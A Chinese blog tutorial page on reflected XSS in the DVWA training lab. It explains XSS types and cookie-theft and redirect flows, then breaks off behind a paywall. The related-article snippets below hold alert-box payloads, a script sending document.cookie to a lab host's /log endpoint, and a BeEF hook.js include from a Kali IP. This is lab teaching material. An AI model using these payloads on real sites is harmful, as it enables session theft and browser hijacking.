Kali渗透测试之DVWA系列4——反射型XSS(跨站脚本攻击)

最新推荐文章于 2025-06-16 18:52:44 发布
原创 最新推荐文章于 2025-06-16 18:52:44 发布 · 4.5k 阅读 · 37 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#XSS

目录

一、XSS

      1、XSS简介

      2、XSS类型

      3、漏洞形成的根源

二、反射型XSS

      1、原理示意图​

      2、实验环境

      3、实验步骤

           安全级别:LOW

                   重定向

                   获取cookie

           安全级别:Medium

           安全级别:High

           安全级别:Impossible

一、XSS

1、XSS简介

        XSS,跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的。

2、XSS类型

  • 反射型XSS:非持久化,需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。
  • 存储型XSS:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户访问该页面的时候触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃cookie。
  • DOM型XSS:文本对象模式XSS,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。

3、漏洞形成的根源

  • 服务器对用户提交的数据过滤不严;
  • 提交给服务器端的脚本被直接返回给其他客户端执行;
  • 脚本在客户端执行恶意操作;

二、反射型XSS

1、原理示意图

获取cookie

  1. 黑客首先向服务器发送js脚本
  2. 服务器将含有js脚本的页面发给黑客
  3. 黑客将js脚本的页面的url发送给被攻击方
  4. 黑客获取被攻击方的cookie

重定向

  1. 黑客首先向服务器发送js脚本
  2. 服务器将含有js脚本的页面发给黑客
  3. 黑客将js脚本的页面的url发送给被攻击方
  4. 被攻击方点击url重定向到第三方网站

2、实验环境

1、测试机:物理机Windows 10,远程登录DVWA;安装BurpSuite

2、DVWA服务器:Windows Server 2003(192.168.247.129),启动phpStudy。

3、实验步骤

安全级别:LOW

查看源码

源码分析

       从源码中可以看到,直接引用来 name参数,并没有对输入的参数做任何过滤;例如:输入a,则返回含有 ' Hello a ' 的js页面。

1、直接嵌入html:<script>alert(‘xss’)</script>,弹出弹框xss。

使用Burpsuite抓包查看,返回的页面信息为含有输入信息的js页面; 

2、元素标签事件<body onload=al

最低0.47元/天 解锁文章

200万优质内容无限畅学
dvwaxss反射型
Alonegrief的博客
12-01 982
Xss漏洞原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的 反射型XSS跨站,不是长期可以加载恶意代码的,并不留存于网站代码中,这种攻击是需要诱导客户去点击特定的URL地址才能触发。 例子: Xss反射型: 打开dvwa,安全级别调为low 发现这有个输入框,尝试的输入点什么进去 发现会直接返回“Hello xxx” 测试xss可以直接在有输入框的位置插入代码 发现直接执行弹窗,1
Kali渗透测试DVWA系列5——存储型XSS(跨站脚本攻击)
浅浅的博客
05-11 3022
目录 一、原理示意图 二、实验环境 三、实验步骤 安全级别:LOW 重定向 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 存储型XSS 长期存储于服务器端 每次用户访问都会被执行javascript脚本 了解XSS简...
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3867
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
【2025版】最新前端必知的跨站脚本攻击XSS)示例与解决方案(非常详细),从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
06-16 1275
O了,看破就是要说破,我是V哥,一个永远18的程序员,喜欢广交天下志同道合的朋友,喜欢分享技术经验,讲真,这会促进我的荷尔蒙分泌,所以会一直坚持下去,欢迎关注威哥爱编程,技术路上我们一起成长。黑客/网络安全学习路线对于从来没有接触过黑客/网络安全的同学,目前网络安全、信息安全也是计算机大学生毕业薪资相对较高的学科。大白也帮大家准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
DVWA反射型XSS
追风筝的孩子
08-15 645
       这反射型XSS的三个等级的代码进行分析,最高级的不讲。 一:LOW等级 1、服务器端核心代码 &lt;?php // Is there any input? if( array_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != NULL ) { // Feedback for end u...
N10 DVWA 反射型XSS
尐猴子君ii的博客
08-25 283
一、概念 XSS,全称Cross Site Scripting,跨站脚本攻击。在页面中注入恶意的脚本代码,当受害者访问该页面是,恶意代码会在其浏览器上执行。XSS不仅仅限于JavaScript,还包含Flash等其他脚本语言。根据恶意代码是否存储在服务器上,XSS可以分为存储性的XSS和反射性的XSS。 DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用的document.baby.innerHtml等函数动态生成的Html页面,如果这些函数在引用某些变量时没
DVWA靶机-反射性XSS漏洞(Reflected)
weixin_43726831的博客
10-24 4539
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command Injection) DVWA靶机-文件包含漏洞(File Inclusion) DVWA靶机-文件上传漏洞(File uploads) DVWA靶机-跨站请求伪造(CSRF) XSS跨站脚本攻击 XS...
DVWA系列(三)——使用Burpsuite进行反射型XSS反射型跨站脚本攻击
橘子女侠
05-05 3995
1. XSS简介 (1)XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; (2)客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; (3)JavaScript 与J...
DVWA系列XSS(跨站脚本攻击)——DOM型XSS源码分析及漏洞利用
7Riven's blog
11-27 1589
DOM型XSS Document Object Model 文本对象模型xss、可能是存储型也可能是反射型、只决定于输出地方 在反射型XSS中输入: <script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...
DVWA系列(五)—— 使用Burpsuite进行反射型XSS反射型跨脚本攻击)
weixin_45116657的博客
08-25 1313
目录: 一、XSS说明: XSS简介 XSS类型 漏洞形成的根源 二、反射型XSS: 原理示意图 实验环境 实验步骤 安全级别:LOW - 重定向 - 获取cookie 安全级别:Medium 安全级别:High 安全级别:Impossible 一、XSS说明 1、XSS简介 XSS,即跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading S...
DVWAXSS(Reflected)反射型XSS
RexHa的博客
10-07 2485
dvwa 反射型XSS
DVWA通关--反射型XSSXSS (Reflected)
箭雨镜屋
12-16 2314
LOW 通关步骤 源码分析
渗透测试基础-反射型XSS原理及实操
热门推荐
weixin_45488495的博客
04-17 1万+
渗透测试基础-反射型XSS原理及实操XSS是什么漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! XSS是什么 因为人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS,但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,将跨站脚本攻击缩写为XSS。这就是XSS名字的由来。XSS攻击是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供
DVWA】--- 九、反射型XSS(XSS Reflected)
qq_43168364的博客
05-31 844
XSS Reflected 目录 一、low级别 二、Medium级别 三、High级别 四、Impossible级别 五、预防方法 一、low级别 这输入的内容会回显出来 构造js代码:<script>alert(/hack/)</script>,会出现弹窗 此时前端的html中已经有我们插入的代码了 但是当我们再点击以下改模块时面的代码就会消失,这就是反射型XSS它时临时的 代码审计 header(“X-XSS-Protection: 0”):X-XSS-Prot
DVWA--反射型XSS(Reflected)攻略详解
Silver_lion的博客
08-13 9159
目录 Low等级 Low等级 输入<script>alert(/xss/)</script>测试漏洞,成功弹框 注:可以弹窗的函数有alert(),confirm(),prompt()
DVWA------反射型XSS
Z_Grant的博客
08-25 1625
文章目录一,XSS中常用的JS代码和HTML元素(1)普通使用(2) 获得cookie和重定向(3)引入脚本文件二,DVWA的学习(1)低级1.1 重定向1.2 获取cookie1.3 kali监听获取目标的cookie(2)中级2.1 绕过方法2.1.1 大写 script2.1.2 复写2.1.3 使用其他没有被过滤的标签(3)高级(4)impossible4.1 绕过方法三,php常用的过滤...
结合DVWA反射型XSS浅析
qq_43660551的博客
01-08 2831
一.概念 XSS跨站脚本攻击。黑客通过HTML注入篡改了网页,在网页中插入恶意脚本。 二.分类 1.反射型XSS:简单地把用户输入的数据反射给浏览器。 2.存储型XSS:将用户输入的数据存储在服务器端。 3.DOM型XSS:通过修改页面的DOM节点形成XSS。 三.DVWA-XSS实践 1.低级 看下源码,这无任何过滤。直接将用户的输入反射给浏览器。 故直接构造payload语句:<script>alert(/This is XSS!/)</s...
DVWA-Xss(reflected)反射型跨站脚本攻击
简简的博客
02-02 1825
系列文集:DVWA学习笔记 反射型Xss &amp;amp;amp;lt;全称跨站脚本攻击,是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。&amp;amp;amp;gt; xss攻击思路 ##Low: 点击右下角的view source,查看源码 分析: arrary_key_exists()函数:判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值...
xss跨站脚本检测的实验,环境同样是kalidvwa
02-23
<think>好的,用户想了解如何使用Kali Linux和DVWA进行XSS跨站脚本检测的实验。我需要先回忆XSS的基本概念和类型,然后考虑实验的具体步骤。首先,DVWA的设置可能需要注意安全等级,比如调到Low或者Medium,这样更容易进行测试。Kali的工具,比如Burp Suite或者手动输入脚本可能都需要用到。 用户可能已经有一定的网络安全基础,但可能还是新手,所以需要详细说明步骤。比如如何启动DVWA,配置环境,登录凭证是什么。然后分步骤测试反射型、存储型和DOM型XSS,每种类型应该有不同的测试方法。比如反射型可能在输入框插入<script>alert('XSS')</script>,而存储型可能会在留言板等地方注入。 还需要提到浏览器的安全机制,比如Chrome的XSS Auditor可能会拦截,所以建议使用Firefox或者降低安全设置。此外,实验结束后应该清理DVWA的数据库,避免影响后续测试。 可能用户没有提到的深层需求是希望了解防御措施,所以在最后补充如何通过代码层面防止XSS,比如转义字符、使用CSP等。这样整个回答会更全面,帮助用户不仅做实验,还能理解防护方法。</think>好的!以下是一个基于 **Kali Linux** 和 **DVWA(Damn Vulnerable Web Application)** 的 XSS(跨站脚本)检测实验的详细指南,涵盖实验环境搭建、攻击演示及防御原理。 -- ### **1. 实验环境准备** - **Kali Linux**:作为攻击者主机,内置渗透测试工具(如 Burp Suite、手动脚本测试)。 - **DVWA**:作为漏洞靶场,需安装在 Kali 或另一台虚拟机中(推荐使用 Docker 快速部署)。 - **浏览器**:建议使用 Firefox(需关闭 XSS 过滤器,或使用旧版本浏览器)。 #### **DVWA 配置步骤** 1. 安装 Docker(Kali 中): ```bash sudo apt update && sudo apt install docker.io ``` 2. 拉取 DVWA 镜像并运行: ```bash sudo docker run -d -p 80:80 vulnerables/web-dvwa ``` 3. 访问 `http://localhost`,登录默认账号:`admin/password`。 4. 在 DVWA Security 页面将安全级别设为 **Low**(方便实验)。 -- ### **2. XSS 攻击类型与实验** #### **(1) 反射型 XSS(Reflected XSS)** **目标**:通过 URL 参数注入恶意脚本,触发弹窗。 **实验步骤**: 1. 进入 DVWA → **XSS (Reflected)** 页面。 2. 在输入框中输入测试脚本: ```html <script>alert('XSS')</script> ``` 3. 点击提交,观察弹窗是否出现。 **原理**:输入内容未经过滤直接输出到页面,脚本被浏览器执行。 #### **(2) 存储型 XSS(Stored XSS)** **目标**:将恶意脚本存储到数据库(如留言板),其他用户访问时触发。 **实验步骤**: 1. 进入 DVWA → **XSS (Stored)** 页面。 2. 在留言框中输入持久化脚本: ```html <script>alert('Stored XSS')</script> ``` 3. 提交后刷新页面或换浏览器访问,观察弹窗是否持续存在。 #### **(3) DOM 型 XSS(DOM-based XSS)** **目标**:通过修改 URL 的 Hash 部分触发脚本执行。 **实验步骤**: 1. 进入 DVWA → **XSS (DOM)** 页面。 2. 修改 URL 末尾添加 `#<script>alert('DOM XSS')</script>`。 3. 观察页面是否执行脚本(需关闭浏览器 XSS 过滤器)。 --- ### **3. 进阶测试工具(Kali 中)** - **Burp Suite**: 拦截 HTTP 请求,修改参数插入 XSS Payload,观察响应。 - **BeEF Framework**: 演示高级攻击(如会话劫持): ```bash sudo beef-xss ``` 在 DVWA 中注入 BeEF Hook 脚本: ```html <script src="http://<Kali_IP>:3000/hook.js"></script> ``` --- ### **4. 防御措施与代码分析** 在 DVWA 的 **High** 安全级别下,观察防御方法: - **输入过滤**:移除 `<script>`、`onerror` 等危险关键词。 - **输出转义**:使用 `htmlspecialchars()` 转义特殊字符(PHP 示例): ```php echo htmlspecialchars($_GET['input'], ENT_QUOTES, 'UTF-8'); ``` - **CSP(内容安全策略)**:通过 HTTP 头限制脚本来源。 -- ### **5. 实验注意事项** - 仅在本地或授权环境测试,避免非法使用。 - 测试后重置 DVWA 数据库(页面底部有重置按钮)。 - 理解漏洞原理后尝试修复代码(DVWA 提供源码示例)。 --- 通过此实验,你可以直观理解 XSS 的危害、攻击方式及防御策略。如果需要更详细的某一步骤,请随时告诉我!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值